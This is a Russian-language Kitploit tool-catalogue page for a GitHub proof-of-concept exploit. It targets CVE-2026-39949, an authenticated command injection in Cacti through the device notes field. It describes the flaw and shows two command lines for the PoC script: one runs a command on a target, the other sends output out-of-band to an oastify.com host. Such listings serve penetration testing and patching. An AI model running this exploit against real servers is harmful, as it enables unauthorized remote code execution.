Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39949 — Cacti ≤ 1.2.30 Auth RCE - Внедрение переменной хоста | Kitploit
Инструменты/GitHubGitHub/lukehebe/cve-2026-39949
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 Auth RCE - Внедрение переменной хоста

Репозиторий
12 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39949: Аутентифицированное удаленное выполнение кода в Cacti через внедрение переменных хоста

Краткое описание

Уязвимость внедрения команд ОС в Cacti ≤ 1.2.30 позволяет любому аутентифицированному пользователю с правами на создание устройств и графических шаблонов выполнять произвольные команды на базовом сервере. Ошибка возникает из-за того, что управляемые пользователем поля метаданных хоста (в частности, поле заметок устройства) подставляются в аргументы командной строки RRDtool через механизм замены переменных Cacti без какой-либо санитизации или экранирования. Злоумышленник может внедрить метасимволы оболочки в поле заметок, создать шаблон графика, ссылающийся на переменную |host_notes|, и запустить рендеринг графика для полного удаленного выполнения кода от имени пользователя веб-сервера.

Использование:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

Выполнение команды OOB:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
изображение
изображение
изображение
Скачать инструмент